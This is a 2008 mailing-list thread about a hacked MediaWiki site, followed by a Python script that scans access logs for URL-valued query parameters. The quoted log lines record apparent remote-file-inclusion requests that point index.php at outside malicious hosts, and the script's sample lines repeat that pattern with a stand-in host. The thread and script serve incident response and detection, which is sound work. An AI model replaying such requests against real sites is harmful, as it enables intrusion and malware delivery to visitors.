Hi Itay,
Without delving into much detail - is there a way you can prevent the
index.php script from being modifiable by the web server process? I don't
know what platform you are running on, but if I understood you correctly it
was that script that got modified - and perhaps it never should be modified
over the web.
Cheers,
Boris.
On Fri, Mar 14, 2008 at 9:52 AM, Itay Ophir <itay(a)worldwideworkshop.org>
wrote:
Hi Everyone,
I hope this is the right place to ask about this (pls point me elsewhere if
needed)
Our MediaWiki was hacked (twice in the past month) and someone was able to
change the root index.html files of our website and add an Iframe to it that
loads a malicious java applet. If users select to run the applet it installs
a virus/trojan on their PC.
After reading the log file I am thinking it's the Wiki's index.php page. The
hosting is NetworkS' who said that I have a vulnerable php script. And I
should fix it.
This is from the log files:
XX.XX.XX.XX - - [29/Feb/2008:00:00:30 -0500] "GET /wiki/index.php?title=Http://uuionmaniskis.rbcmail.ru/images%3F HTTP/1.1" 200 1688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:00:29 -0500] "GET /wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:01:41 -0500] "GET /wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
XX.XX.XX - - [29/Feb/2008:00:01:19 -0500] "GET /wiki/index.php?title=http://sschhhoolsucksmmman.krovatka.su/images? HTTP/1.1" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:05:48 -0500] "GET /wiki/index.php?title=Http://zaperyan1918moon.chat.ru/html/aboutme%3F HTTP/1.1" 200 1700 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
Can anyone advise on how to protect it/prevent future attacks?
Thanks a lot in advance!
Itay
--
Boris Epstein
http://www.dogandponny.org/
http://dikayasobaka.livejournal.com/ (Russian)
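
The request pattern in the log excerpt above, a `title` parameter whose value is an absolute URL, can be flagged automatically when reviewing access logs. The following is an added example, not part of the original thread: it parses Combined Log Format lines and reports URL-valued query parameters with the response status for triage; the sample lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Matched against the percent-decoded value, case-insensitively, so that
# "Http://...%3F" and "http://...?" are treated the same way.
URL_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def url_valued_params(target):
    """Return (name, decoded value) pairs whose value starts with a URL scheme."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(name, value) for name, value in pairs if URL_VALUE_RE.match(value)]


def scan(lines):
    """Return one finding per URL-valued parameter; unparsable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in url_valued_params(m.group('target')):
            findings.append({
                'host': m.group('host'),
                'time': m.group('time'),
                'status': int(m.group('status')),
                'param': name,
                'value': value,
            })
    return findings


# Constructed sample input (documentation addresses and .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Feb/2008:00:00:29 -0500] "GET /wiki/index.php?title=http://files.example.invalid/images? HTTP/1.1" 301 96 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [29/Feb/2008:00:00:30 -0500] "GET /wiki/index.php?title=Http://files.example.invalid/images%3F HTTP/1.1" 200 1688 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [29/Feb/2008:00:02:10 -0500] "GET /wiki/index.php?title=Main_Page&action=history HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    'not an access log line',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 means the server answered the request with a page rather than a redirect, so those entries are the ones to look at first.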